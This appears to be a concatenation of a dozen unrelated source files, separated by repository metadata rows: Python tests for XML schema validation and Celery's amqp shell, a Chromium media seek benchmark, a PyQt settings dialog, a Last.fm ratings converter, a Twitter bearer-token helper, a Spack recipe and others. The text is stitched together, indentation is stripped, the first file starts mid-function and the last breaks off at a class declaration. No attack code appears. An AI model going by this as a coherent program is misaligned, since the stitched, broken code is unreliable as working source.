try:
file(os.path.join(tmpdir, "schema.xsd"), "w+").write(xmlSchema1)
stream = StringIO.StringIO(xmlData1)
xmllib.DataBinder.validate(stream, tmpdir)
# xmlData2 should fail
stream = StringIO.StringIO(xmlData2)
e = self.failUnlessRaises(xmllib.SchemaValidationError,
xmllib.DataBinder.validate, stream, tmpdir)
self.failUnlessEqual(str(e), schemaError2)
finally:
shutil.rmtree(tmpdir, ignore_errors = True)
def testParseFileValidate(self):
tmpdir = tempfile.mkdtemp()
stream = StringIO.StringIO(xmlData1)
try:
file(os.path.join(tmpdir, "schema.xsd"), "w+").write(xmlSchema1)
binder = xmllib.DataBinder()
binder.parseFile(stream, validate = True, schemaDir = tmpdir)
binder.parseString(xmlData1, validate = True, schemaDir = tmpdir)
# Try to pass None as a schema directory - should fail
stream.seek(0)
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
binder.parseFile, stream, validate = True, schemaDir = None)
self.failUnlessEqual(str(e), "Schema directory not specified")
finally:
shutil.rmtree(tmpdir, ignore_errors = True)
xmlSchema1 = """\
<?xml version="1.0" encoding="UTF-8"?>
<xsd:schema targetNamespace="http://my.example.com"
elementFormDefault="qualified"
attributeFormDefault="unqualified"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.w3.org/2001/XMLSchema.xsd"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns="http://www.rpath.com/permanent/rpd-1.0.xsd">
<xsd:element name="f">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="c1" type="xsd:string" />
<xsd:element name="c2" type="xsd:string" />
</xsd:sequence>
</xsd:complexType>
</xsd:element>
</xsd:schema>"""
xmlData1 = """\
<?xml version="1.0" encoding="UTF-8"?>
<f xmlns="http://my.example.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="schema.xsd">
<c1/>
<c2/>
</f>"""
xmlData2 = xmlData1.replace("<c1/>", "")
schemaError2 = (
"<string>:4:0:ERROR:SCHEMASV:SCHEMAV_ELEMENT_CONTENT: "
"Element '{http://my.example.com}c2': This element is not expected. "
"Expected is ( {http://my.example.com}c1 )."
)
|
apache-2.0
| 6,671,211,518,318,611,000 | 35.810891 | 119 | 0.586353 | false |
keishi/chromium
|
chrome/test/functional/media/media_seek_perf.py
|
1
|
4233
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Seek performance testing for <video>.
Calculates the short and long seek times for different video formats on
different network constraints.
"""
import logging
import os
import pyauto_media
import pyauto_utils
import cns_test_base
import worker_thread
# Number of threads to use during testing.
_TEST_THREADS = 3
# HTML test path; relative to src/chrome/test/data.
_TEST_HTML_PATH = os.path.join('media', 'html', 'media_seek.html')
# The media files used for testing.
# Path under CNS root folder (pyauto_private/media).
_TEST_VIDEOS = [os.path.join('dartmoor', name) for name in
['dartmoor2.ogg', 'dartmoor2.m4a', 'dartmoor2.mp3',
'dartmoor2.wav']]
_TEST_VIDEOS.extend(os.path.join('crowd', name) for name in
['crowd1080.webm', 'crowd1080.ogv', 'crowd1080.mp4',
'crowd360.webm', 'crowd360.ogv', 'crowd360.mp4'])
# Constraints to run tests on.
_TESTS_TO_RUN = [
cns_test_base.Cable,
cns_test_base.Wifi,
cns_test_base.NoConstraints]
class SeekWorkerThread(worker_thread.WorkerThread):
"""Worker thread. Runs a test for each task in the queue."""
def RunTask(self, unique_url, task):
"""Runs the specific task on the url given.
It is assumed that a tab with the unique_url is already loaded.
Args:
unique_url: A unique identifier of the test page.
task: A (series_name, settings, file_name) tuple to run the test on.
"""
series_name, settings, file_name = task
video_url = cns_test_base.GetFileURL(
file_name, bandwidth=settings[0], latency=settings[1],
loss=settings[2])
# Start the test!
self.CallJavascriptFunc('startTest', [video_url], unique_url)
logging.debug('Running perf test for %s.', video_url)
    # Timeout is dependent on (seeking time * iterations). For 3 iterations
    # per seek we get a total of 18 seeks per test. We expect buffered and
    # cached seeks to be fast. Through experimentation an average of 10 secs
# per seek was found to be adequate.
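    # (18 seeks * ~10 s ~= 180 s; the 300 s timeout below leaves headroom
    # for the constrained-network configurations.)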
if not self.WaitUntil(self.GetDOMValue, args=['endTest', unique_url],
retry_sleep=5, timeout=300, debug=False):
error_msg = 'Seek tests timed out.'
else:
error_msg = self.GetDOMValue('errorMsg', unique_url)
cached_states = self.GetDOMValue(
"Object.keys(CachedState).join(',')", unique_url).split(',')
seek_test_cases = self.GetDOMValue(
"Object.keys(SeekTestCase).join(',')", unique_url).split(',')
graph_name = series_name + '_' + os.path.basename(file_name)
for state in cached_states:
for seek_case in seek_test_cases:
values = self.GetDOMValue(
"seekRecords[CachedState.%s][SeekTestCase.%s].join(',')" %
(state, seek_case), unique_url)
if values:
results = [float(value) for value in values.split(',')]
else:
results = []
pyauto_utils.PrintPerfResult('seek', '%s_%s_%s' %
(state, seek_case, graph_name),
results, 'sec')
if error_msg:
logging.error('Error while running %s: %s.', graph_name, error_msg)
return False
else:
return True
class MediaSeekPerfTest(cns_test_base.CNSTestBase):
"""PyAuto test container. See file doc string for more information."""
def __init__(self, *args, **kwargs):
"""Initialize the CNSTestBase with socket_timeout = 60 secs."""
cns_test_base.CNSTestBase.__init__(self, socket_timeout='60',
*args, **kwargs)
def testMediaSeekPerformance(self):
"""Launches HTML test which plays each video and records seek stats."""
tasks = cns_test_base.CreateCNSPerfTasks(_TESTS_TO_RUN, _TEST_VIDEOS)
if worker_thread.RunWorkerThreads(self, SeekWorkerThread, tasks,
_TEST_THREADS, _TEST_HTML_PATH):
self.fail('Some tests failed to run as expected.')
if __name__ == '__main__':
pyauto_media.Main()
|
bsd-3-clause
| 229,085,850,465,928,320 | 35.179487 | 77 | 0.636192 | false |
Cobliteam/shelver
|
shelver/provider/test.py
|
1
|
1626
|
import logging
from shelver.artifact import Artifact
from shelver.registry import Registry
from shelver.build import Builder
from .base import Provider
logger = logging.getLogger('shelver.provider.test')
class TestArtifact(Artifact):
def __init__(self, id, **kwargs):
super().__init__(**kwargs)
self._id = id
@property
def id(self):
return self._id
class TestRegistry(Registry):
async def load_artifact_by_id(self, id, region=None, image=None):
name, version = id.split(':')
if not image:
image = self.get_image(name)
artifact = TestArtifact(self.provider, id, image=image,
version=version, environment='test')
self.register_artifact(artifact)
self.associate_artifact(artifact, image, version)
return artifact
async def load_existing_artifacts(self, region=None):
pass
class TestBuilder(Builder):
async def run_build(self, image, version, base_artifact=None,
msg_stream=None):
image = self.registry.get_image(image)
if not version:
version = image.current_version
else:
assert version == image.current_version
id = '{}:{}'.format(image.name, version)
logging.info('Built fake artifact %s for image %s:%s', id,
image.name, version)
artifact = {'id': id}
return [artifact]
class TestProvider(Provider):
name = 'test'
aliases = ()
artifact_class = TestArtifact
registry_class = TestRegistry
builder_class = TestBuilder
|
mpl-2.0
| -8,799,597,469,075,863,000 | 25.655738 | 69 | 0.615621 | false |
jingxiang-li/kaggle-yelp
|
archive/preprocess.py
|
1
|
1280
|
from __future__ import division, absolute_import
from __future__ import print_function, unicode_literals
import pandas as pd
from transfer_features import *
# process training data
biz2label = pd.read_csv("rawdata/train.csv", index_col=0)
photo2biz = pd.read_csv("rawdata/train_photo_to_biz_ids.csv", index_col=0)
biz2label.sort_index(inplace=True)
for biz_id, biz_label in biz2label.iterrows():
photo_ids = photo2biz[photo2biz["business_id"] == biz_id].index
batch_size = len(photo_ids)
img_list = ['rawdata/train_photos/' + str(id) + '.jpg' for id in photo_ids]
# pprint(img_list)
out_file = 'features/inception-21k-global/' + str(biz_id) + '.npy'
X = get_features(img_list, 'models/inception-21k/Inception', 9)
np.save(out_file, X)
print(out_file, 'finished!!')
# process test data
photo2biz = pd.read_csv("rawdata/test_photo_to_biz.csv")
photo_ids = photo2biz["photo_id"]
photo_ids = np.unique(photo_ids)
f = open("features/inception-21k-global-test.csv", 'w')
for photo_id in photo_ids:
img_list = ['rawdata/test_photos/' + str(photo_id) + '.jpg']
X = get_features(img_list, 'models/inception-21k/Inception', 9)[0, :]
f.write(str(photo_id) + ',')
f.write(",".join(X.astype(str)) + '\n')
print(photo_id, 'finished!!')
|
mit
| 8,042,651,720,519,711,000 | 36.647059 | 79 | 0.673438 | false |
lefthand3r/scienceanalyst
|
get_bearer_token.py
|
1
|
1028
|
import base64
import requests
import ignore
consumer_key = ignore.TWITTER_CONSUMER_KEY
consumer_secret = ignore.TWITTER_CONSUMER_SECRET
access_token = ignore.TWITTER_ACCESS_TOKEN
access_secret = ignore.TWITTER_ACCESS_SECRET
def get_bearer_token(consumer_key, consumer_secret):
# get bearer token for application only requests
bearer_token_credentials = base64.urlsafe_b64encode('{}:{}'.format(consumer_key, consumer_secret).encode('ascii')).decode('ascii')
url = 'https://api.twitter.com/oauth2/token'
headers = {
'Authorization': 'Basic {}'.format(bearer_token_credentials),
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
}
data = 'grant_type=client_credentials'
response = requests.post(url, headers=headers, data=data)
response_data = response.json()
if response_data['token_type'] == 'bearer':
bearer_token = response_data['access_token']
else:
raise RuntimeError('unexpected token type: {}'.format(response_data['token_type']))
return bearer_token
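if __name__ == '__main__':
    # Illustrative usage sketch: the endpoint and query below are examples
    # chosen for this sketch, not taken from the original file.
    token = get_bearer_token(consumer_key, consumer_secret)
    resp = requests.get(
        'https://api.twitter.com/1.1/search/tweets.json',
        headers={'Authorization': 'Bearer {}'.format(token)},
        params={'q': 'python'})
    print(resp.status_code)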
|
gpl-3.0
| -4,461,987,115,436,144,000 | 40.12 | 134 | 0.713035 | false |
jaakkojulin/potku
|
Dialogs/GlobalSettingsDialog.py
|
1
|
10692
|
# coding=utf-8
'''
Created on 30.4.2013
Updated on 26.8.2013
Potku is a graphical user interface for analyzation and
visualization of measurement data collected from a ToF-ERD
telescope. For physics calculations Potku uses external
analyzation components.
Copyright (C) Jarkko Aalto, Timo Konu, Samuli Kärkkäinen, Samuli Rahkonen and
Miika Raunio
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program (file named 'LICENCE').
'''
__author__ = "Jarkko Aalto \n Timo Konu \n Samuli Kärkkäinen \n Samuli Rahkonen \n Miika Raunio"
__versio__ = "1.0"
from os import path
from PyQt4 import QtCore, uic, QtGui
from Dialogs.ImportMeasurementDialog import CoincTiming
from Widgets.MatplotlibTofeHistogramWidget import MatplotlibHistogramWidget
class GlobalSettingsDialog(QtGui.QDialog):
def __init__(self, masses, settings):
'''Constructor for the program
'''
super().__init__()
self.masses = masses
self.settings = settings
self.__added_timings = {} # Placeholder for timings
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.ui = uic.loadUi(path.join("ui_files", "ui_global_settings.ui"), self)
# Connect UI buttons
self.ui.OKButton.clicked.connect(self.__accept_changes)
self.ui.cancelButton.clicked.connect(self.close)
self.ui.loadProjectPathButton.clicked.connect(
self.__change_project_directory)
self.ui.loadEffPathButton.clicked.connect(
self.__change_efficiency_directory)
buttons = self.ui.findChild(QtGui.QButtonGroup, "elementButtons")
buttons.buttonClicked.connect(self.__change_element_color)
self.line_coinc_count.setValidator(QtGui.QIntValidator(0, 1000000))
self.__set_values()
self.exec_()
def __set_values(self):
'''Set settings values to dialog.
'''
self.ui.projectPathLineEdit.setText(self.settings.get_project_directory())
self.ui.lineEdit_eff_directory.setText(
self.settings.get_efficiency_directory())
for button in self.ui.groupBox_3.findChildren(QtGui.QPushButton):
self.__set_button_color(button,
self.settings.get_element_color(button.text()))
label_adc = QtGui.QLabel("ADC")
label_low = QtGui.QLabel("Low")
label_high = QtGui.QLabel("High")
self.ui.grid_timing.addWidget(label_adc, 0, 0)
self.ui.grid_timing.addWidget(label_low, 1, 0)
self.ui.grid_timing.addWidget(label_high, 2, 0)
for i in range(0, 3):
timing = self.settings.get_import_timing(i)
label = QtGui.QLabel("{0}".format(i))
spin_low = self.__create_spinbox(timing[0])
spin_high = self.__create_spinbox(timing[1])
self.__added_timings[i] = CoincTiming(i, spin_low, spin_high)
self.ui.grid_timing.addWidget(label, 0, i + 1)
self.ui.grid_timing.addWidget(spin_low, 1, i + 1)
self.ui.grid_timing.addWidget(spin_high, 2, i + 1)
self.line_coinc_count.setText(str(self.settings.get_import_coinc_count()))
self.__set_cross_sections()
self.check_es_output.setChecked(self.settings.is_es_output_saved())
# ToF-E graph settings
self.ui.check_tofe_invert_x.setChecked(self.settings.get_tofe_invert_x())
self.ui.check_tofe_invert_y.setChecked(self.settings.get_tofe_invert_y())
self.ui.check_tofe_transpose.setChecked(self.settings.get_tofe_transposed())
tofe_bin_mode = self.settings.get_tofe_bin_range_mode()
self.ui.radio_tofe_bin_auto.setChecked(tofe_bin_mode == 0)
self.ui.radio_tofe_bin_manual.setChecked(tofe_bin_mode == 1)
x_range_min, x_range_max = self.settings.get_tofe_bin_range_x()
y_range_min, y_range_max = self.settings.get_tofe_bin_range_y()
self.ui.spin_tofe_bin_x_max.setValue(x_range_max)
self.ui.spin_tofe_bin_x_min.setValue(x_range_min)
self.ui.spin_tofe_bin_y_max.setValue(y_range_max)
self.ui.spin_tofe_bin_y_min.setValue(y_range_min)
self.ui.spin_tofe_compression_x.setValue(
self.settings.get_tofe_compression_x())
self.ui.spin_tofe_compression_y.setValue(
self.settings.get_tofe_compression_y())
self.ui.spin_depth_iterations.setValue(self.settings.get_num_iterations())
dirtyinteger = 0
colors = sorted(MatplotlibHistogramWidget.color_scheme.items())
for key, unused_value in colors:
self.ui.combo_tofe_colors.addItem(key)
if key == self.settings.get_tofe_color():
self.ui.combo_tofe_colors.setCurrentIndex(dirtyinteger)
dirtyinteger += 1
def __create_spinbox(self, default):
spinbox = QtGui.QSpinBox()
spinbox.stepBy(1)
spinbox.setMinimum(-1000)
spinbox.setMaximum(1000)
spinbox.setValue(int(default))
return spinbox
def __accept_changes(self):
'''Accept changed settings and save.
'''
self.settings.set_project_directory(self.ui.projectPathLineEdit.text())
self.settings.set_efficiency_directory(
self.ui.lineEdit_eff_directory.text())
for button in self.ui.groupBox_3.findChildren(QtGui.QPushButton):
self.settings.set_element_color(button.text(), button.color)
for key in self.__added_timings.keys():
coinc_timing = self.__added_timings[key]
self.settings.set_import_timing(key,
coinc_timing.low.value(),
coinc_timing.high.value())
self.settings.set_import_coinc_count(self.line_coinc_count.text())
# Save cross sections
if self.ui.radio_cross_1.isChecked():
flag_cross = 1
elif self.ui.radio_cross_2.isChecked():
flag_cross = 2
elif self.ui.radio_cross_3.isChecked():
flag_cross = 3
self.settings.set_cross_sections(flag_cross)
self.settings.set_es_output_saved(self.check_es_output.isChecked())
# ToF-E graph settings
self.settings.set_tofe_invert_x(self.ui.check_tofe_invert_x.isChecked())
self.settings.set_tofe_invert_y(self.ui.check_tofe_invert_y.isChecked())
self.settings.set_tofe_transposed(self.ui.check_tofe_transpose.isChecked())
self.settings.set_tofe_color(self.ui.combo_tofe_colors.currentText())
if self.ui.radio_tofe_bin_auto.isChecked():
self.settings.set_tofe_bin_range_mode(0)
elif self.ui.radio_tofe_bin_manual.isChecked():
self.settings.set_tofe_bin_range_mode(1)
x_r_min = self.ui.spin_tofe_bin_x_min.value()
x_r_max = self.ui.spin_tofe_bin_x_max.value()
y_r_min = self.ui.spin_tofe_bin_y_min.value()
y_r_max = self.ui.spin_tofe_bin_y_max.value()
        if x_r_min > x_r_max:
            x_r_min = 0
        if y_r_min > y_r_max:
            y_r_min = 0
compression_x = self.ui.spin_tofe_compression_x.value()
compression_y = self.ui.spin_tofe_compression_y.value()
self.settings.set_tofe_bin_range_x(x_r_min, x_r_max)
self.settings.set_tofe_bin_range_y(y_r_min, y_r_max)
self.settings.set_tofe_compression_x(compression_x)
self.settings.set_tofe_compression_y(compression_y)
self.settings.set_num_iterations(self.ui.spin_depth_iterations.value())
# Save config and close
self.settings.save_config()
self.close()
def __change_project_directory(self):
'''Change default project directory.
'''
folder = QtGui.QFileDialog.getExistingDirectory(self,
"Select default project directory",
directory=self.ui.projectPathLineEdit.text())
if folder:
self.ui.projectPathLineEdit.setText(folder)
def __change_efficiency_directory(self):
'''Change efficiency file directory.
'''
folder = QtGui.QFileDialog.getExistingDirectory(self,
"Select efficiency file directory",
directory=self.ui.lineEdit_eff_directory.text())
if folder:
self.ui.lineEdit_eff_directory.setText(folder)
def __change_element_color(self, button):
'''Change color of element button.
Args:
button: QPushButton
'''
dialog = QtGui.QColorDialog(self)
self.color = dialog.getColor(QtGui.QColor(button.color),
self,
"Select Color for Element: {0}".format(
button.text()))
if self.color.isValid():
self.__set_button_color(button, self.color.name())
def __set_button_color(self, button, color_name):
'''Change button text color.
Args:
button: QPushButton
color_name: String representing color.
'''
text_color = "black"
color = QtGui.QColor(color_name)
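        # Rec. 709 luma coefficients: estimate the perceived brightness of
        # the background color (0-255 scale) so dark colors get white text.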
luminance = 0.2126 * color.red() + 0.7152 * color.green()
luminance += 0.0722 * color.blue()
if luminance < 50:
text_color = "white"
button.color = color.name()
if not button.isEnabled():
return # Do not set color for disabled buttons.
button.setStyleSheet("background-color: {0}; color: {1};".format(
color.name(), text_color))
def __set_cross_sections(self):
'''Set cross sections to UI.
'''
flag = self.settings.get_cross_sections()
self.ui.radio_cross_1.setChecked(flag == 1)
self.ui.radio_cross_2.setChecked(flag == 2)
self.ui.radio_cross_3.setChecked(flag == 3)
|
gpl-2.0
| 4,782,183,714,612,712,000 | 43.533333 | 96 | 0.605913 | false |
sscdotopen/musicwithtaste
|
tools/dataset.py
|
1
|
3138
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Licensed to Sebastian Schelter (ssc[at]apache.org), who licenses this file
# to You under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os
import urllib, tarfile, math
import hashlib, numpy
import random
# Big thanks to Alex S. for figuring out that piece of code
def mahout_hash(value):
md5_hash = hashlib.md5(value).digest()
hash = numpy.int64(0)
for c in md5_hash[:8]:
hash = hash << 8 | ord(c)
return str(hash)
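# Example (hypothetical input): mahout_hash('radiohead') yields a signed
# 64-bit integer built from the first 8 bytes of the MD5 digest, rendered
# as a decimal string -- stable across runs, so it works as a join key.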
# we use the log of plays as smoothed rating
def smoothed_rating(times_played):
if (times_played == 0):
rating = 1
else:
rating = int(math.log(times_played) + 1)
if rating > 10:
rating = 10
return str(rating)
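# Worked examples: 0 or 1 plays -> 1, 100 plays -> int(log(100)) + 1 = 5,
# and anything from about e^10 (~22000) plays upwards is capped at 10.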
if len(sys.argv) != 2:
print 'usage: %s <directory>' % os.path.basename(sys.argv[0])
sys.exit(-1)
directory = sys.argv[1]
# download file
print '[1] Downloading http://mtg.upf.edu/static/datasets/last.fm/lastfm-dataset-360K.tar.gz (543MB)'
urllib.urlretrieve ("http://mtg.upf.edu/static/datasets/last.fm/lastfm-dataset-360K.tar.gz",
directory + "/lastfm-dataset-360K.tar.gz")
## extract play data from tar file
tar = tarfile.open(directory + "/lastfm-dataset-360K.tar.gz", 'r:gz')
print '[2] Extracting lastfm-dataset-360K/usersha1-artmbid-artname-plays.tsv (1.5GB)'
tar.extract('lastfm-dataset-360K/usersha1-artmbid-artname-plays.tsv', directory)
print '[3] Converting plays to ratings'
artist_names = set()
lines_read = 0
with open(directory + '/lastfm-ratings.csv', 'w') as preferences_file:
with open(directory + '/lastfm-dataset-360K/usersha1-artmbid-artname-plays.tsv', 'r') as plays_file:
for line in plays_file:
lines_read += 1
(user_id, artist_id, artist_name, plays) = line.strip().split('\t')
artist_names.add(artist_name)
rating = smoothed_rating(int(plays))
preferences_file.write(mahout_hash(user_id) + ',' + mahout_hash(artist_name) + ',' + rating + '\n')
if lines_read % 100000 == 0:
print "%d lines read..." % lines_read
print "%d lines read, done" % lines_read
print '[4] Saving artist names'
artist_names = list(artist_names)
artist_names.sort()
with open(directory + '/lastfm-artists.csv', 'w') as artists_file:
for artist_name in artist_names:
artists_file.write(artist_name + '\n')
print '[5] creating a 10% percent sample of the data'
random.seed('xKrot37')
with open(directory + '/lastfm-ratings-sample-10-percent.csv', 'w') as sampled_preferences:
with open(directory + '/lastfm-ratings.csv', 'r') as preferences_file:
for line in preferences_file:
if random.randint(1, 100) <= 10:
sampled_preferences.write(line)
|
apache-2.0
| 6,709,835,080,681,461,000 | 32.752688 | 105 | 0.695347 | false |
blabla1337/skf-flask
|
skf/api/checklist/endpoints/checklist_item_delete.py
|
1
|
1036
|
from flask import request
from flask_restplus import Resource
from skf.api.security import security_headers, validate_privilege
from skf.api.checklist.business import delete_checklist_item
from skf.api.checklist.serializers import message
from skf.api.kb.parsers import authorization
from skf.api.restplus import api
from skf.api.security import log, val_num, val_float, val_alpha_num, val_alpha_num_special
ns = api.namespace('checklist', description='Operations related to checklist items')
@ns.route('/delete/item/<int:id>')
@api.doc(params={'id': 'DB id of the checklist item'})
@api.response(404, 'Validation error', message)
class ChecklistItemDelete(Resource):
@api.expect(authorization)
@api.response(400, 'No results found', message)
def delete(self, id):
"""
Delete a checklist item.
* Privileges required: **delete**
"""
val_num(id)
validate_privilege(self, 'delete')
result = delete_checklist_item(id)
return result, 200, security_headers()
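# Example request (hypothetical host, port and API prefix; the Authorization
# header is read by validate_privilege):
#   curl -X DELETE http://localhost:8888/api/checklist/delete/item/42 \
#        -H "Authorization: <JWT token>"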
|
agpl-3.0
| -673,249,171,624,648,400 | 37.37037 | 90 | 0.714286 | false |
Tonny-Gu/Project-Habrew
|
HAP-Python/experiment/Hapmgr/hap_main.py
|
1
|
1036
|
from hap_config_editor import hap_config_editor
import hap_config
import time
import threading
HAP_CE = hap_config_editor()
HAP_List = hap_config.HAP_List
# HAP_List HAP_ID HAP_Name login_time
def register(hap_name, hap_type, val_list=[], func_list=[]):
hap_id = "{0:04d}".format((len(HAP_List) + 1))
HAP_List.append([hap_id, hap_name, hap_type, time.time(), val_list, func_list])
HAP_CE.set_var("HAP_List", HAP_List)
print("New HAP registered!Name:" + hap_name + " ID:" + hap_id)
return hap_id
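# Example (hypothetical values): register('LivingRoomLamp', 'switch') appends
# an entry to HAP_List and returns a zero-padded id such as '0001'.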
def login(hap_id):
flag = 0
for i in range(0, len(HAP_List)):
if hap_id == HAP_List[i][0]:
print("HAP:" + hap_id + " Logged in.")
flag = 1
HAP_List[i][3] = time.time()
break
if flag == 0:
print("This HAP hasn't registered!")
def auto_save():
HAP_CE.save_config()
    # threading.Timer takes seconds, not milliseconds; schedule the next
    # save one minute from now (60 * 1000 would wait almost 17 hours).
    timer1 = threading.Timer(60, auto_save)
timer1.start()
if __name__ == 'hap_main':  # true when imported as the hap_main module
print('test2')
from hap_lib import *
hap_init()
auto_save()
|
gpl-3.0
| -3,517,986,094,328,181,000 | 25.564103 | 83 | 0.588803 | false |
sivaprakashniet/push_pull
|
p2p/lib/python2.7/site-packages/celery/tests/bin/test_amqp.py
|
1
|
4738
|
from __future__ import absolute_import
from mock import Mock, patch
from celery.bin.amqp import (
AMQPAdmin,
AMQShell,
dump_message,
amqp,
main,
)
from celery.tests.case import AppCase, WhateverIO
class test_AMQShell(AppCase):
def setup(self):
self.fh = WhateverIO()
self.adm = self.create_adm()
self.shell = AMQShell(connect=self.adm.connect, out=self.fh)
def create_adm(self, *args, **kwargs):
return AMQPAdmin(app=self.app, out=self.fh, *args, **kwargs)
def test_queue_declare(self):
self.shell.onecmd('queue.declare foo')
self.assertIn('ok', self.fh.getvalue())
def test_missing_command(self):
self.shell.onecmd('foo foo')
self.assertIn('unknown syntax', self.fh.getvalue())
def RV(self):
raise Exception(self.fh.getvalue())
def test_spec_format_response(self):
spec = self.shell.amqp['exchange.declare']
self.assertEqual(spec.format_response(None), 'ok.')
self.assertEqual(spec.format_response('NO'), 'NO')
def test_missing_namespace(self):
self.shell.onecmd('ns.cmd arg')
self.assertIn('unknown syntax', self.fh.getvalue())
def test_help(self):
self.shell.onecmd('help')
self.assertIn('Example:', self.fh.getvalue())
def test_help_command(self):
self.shell.onecmd('help queue.declare')
self.assertIn('passive:no', self.fh.getvalue())
def test_help_unknown_command(self):
self.shell.onecmd('help foo.baz')
self.assertIn('unknown syntax', self.fh.getvalue())
def test_onecmd_error(self):
self.shell.dispatch = Mock()
self.shell.dispatch.side_effect = MemoryError()
self.shell.say = Mock()
self.assertFalse(self.shell.needs_reconnect)
self.shell.onecmd('hello')
self.assertTrue(self.shell.say.called)
self.assertTrue(self.shell.needs_reconnect)
def test_exit(self):
with self.assertRaises(SystemExit):
self.shell.onecmd('exit')
self.assertIn("don't leave!", self.fh.getvalue())
def test_note_silent(self):
self.shell.silent = True
self.shell.note('foo bar')
self.assertNotIn('foo bar', self.fh.getvalue())
def test_reconnect(self):
self.shell.onecmd('queue.declare foo')
self.shell.needs_reconnect = True
self.shell.onecmd('queue.delete foo')
def test_completenames(self):
self.assertEqual(
self.shell.completenames('queue.dec'),
['queue.declare'],
)
self.assertEqual(
sorted(self.shell.completenames('declare')),
sorted(['queue.declare', 'exchange.declare']),
)
def test_empty_line(self):
self.shell.emptyline = Mock()
self.shell.default = Mock()
self.shell.onecmd('')
self.shell.emptyline.assert_called_with()
self.shell.onecmd('foo')
self.shell.default.assert_called_with('foo')
def test_respond(self):
self.shell.respond({'foo': 'bar'})
self.assertIn('foo', self.fh.getvalue())
def test_prompt(self):
self.assertTrue(self.shell.prompt)
def test_no_returns(self):
self.shell.onecmd('queue.declare foo')
self.shell.onecmd('exchange.declare bar direct yes')
self.shell.onecmd('queue.bind foo bar baz')
self.shell.onecmd('basic.ack 1')
def test_dump_message(self):
m = Mock()
m.body = 'the quick brown fox'
m.properties = {'a': 1}
m.delivery_info = {'exchange': 'bar'}
self.assertTrue(dump_message(m))
def test_dump_message_no_message(self):
self.assertIn('No messages in queue', dump_message(None))
def test_note(self):
self.adm.silent = True
self.adm.note('FOO')
self.assertNotIn('FOO', self.fh.getvalue())
def test_run(self):
a = self.create_adm('queue.declare foo')
a.run()
self.assertIn('ok', self.fh.getvalue())
def test_run_loop(self):
a = self.create_adm()
a.Shell = Mock()
shell = a.Shell.return_value = Mock()
shell.cmdloop = Mock()
a.run()
shell.cmdloop.assert_called_with()
shell.cmdloop.side_effect = KeyboardInterrupt()
a.run()
self.assertIn('bibi', self.fh.getvalue())
@patch('celery.bin.amqp.amqp')
def test_main(self, Command):
c = Command.return_value = Mock()
main()
c.execute_from_commandline.assert_called_with()
@patch('celery.bin.amqp.AMQPAdmin')
def test_command(self, cls):
x = amqp(app=self.app)
x.run()
self.assertIs(cls.call_args[1]['app'], self.app)
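# For context, the shell under test is normally driven interactively, e.g.:
#   $ celery amqp
#   1> queue.declare foo
# (prompt and output shown for illustration; exact text depends on the broker)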
|
bsd-3-clause
| 5,444,333,020,539,348,000 | 29.567742 | 68 | 0.606585 | false |
iulian787/spack
|
var/spack/repos/builtin/packages/orc/package.py
|
2
|
1438
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Orc(CMakePackage):
"""the smallest, fastest columnar storage for Hadoop
workloads."""
homepage = "https://orc.apache.org/"
url = "https://github.com/apache/orc/archive/rel/release-1.6.5.tar.gz"
version('1.6.5', sha256='df5885db8fa2e4435db8d486c6c7fc4e2c565d6197eee27729cf9cbdf36353c0')
depends_on('maven')
depends_on('openssl')
depends_on('zlib@1.2.11:')
depends_on('pcre')
depends_on('protobuf@3.5.1:')
depends_on('zstd@1.4.5:')
depends_on('googletest@1.8.0:')
depends_on('snappy@1.1.7:')
depends_on('lz4@1.7.5:')
patch('thirdparty.patch')
def cmake_args(self):
args = []
args.append('-DCMAKE_CXX_FLAGS=' + self.compiler.cxx_pic_flag)
args.append('-DCMAKE_C_FLAGS=' + self.compiler.cc_pic_flag)
args.append('-DINSTALL_VENDORED_LIBS:BOOL=OFF')
args.append('-DBUILD_LIBHDFSPP:BOOL=OFF')
args.append('-DBUILD_TOOLS:BOOL=OFF')
args.append('-DBUILD_CPP_TESTS:BOOL=OFF')
for x in ('snappy', 'zlib', 'zstd', 'lz4', 'protobuf'):
args.append('-D{0}_HOME={1}'.format(x.upper(),
self.spec[x].prefix))
return args
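# Typical usage, assuming a working Spack installation (for illustration):
#   $ spack install orc@1.6.5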
|
lgpl-2.1
| 1,645,949,391,752,511,000 | 32.44186 | 96 | 0.61822 | false |
mtlynch/ndt-e2e-clientworker
|
client_wrapper/http_server.py
|
1
|
7702
|
# Copyright 2016 Measurement Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines HTTP servers for web-based NDT clients.
Defines various HTTP server classes meant for hosting web-based NDT client
implementations.
"""
import BaseHTTPServer
import datetime
import json
import logging
import SimpleHTTPServer
import threading
import urllib
import pytz
import http_response
logger = logging.getLogger(__name__)
class Error(Exception):
pass
class HttpWaitTimeoutError(Error):
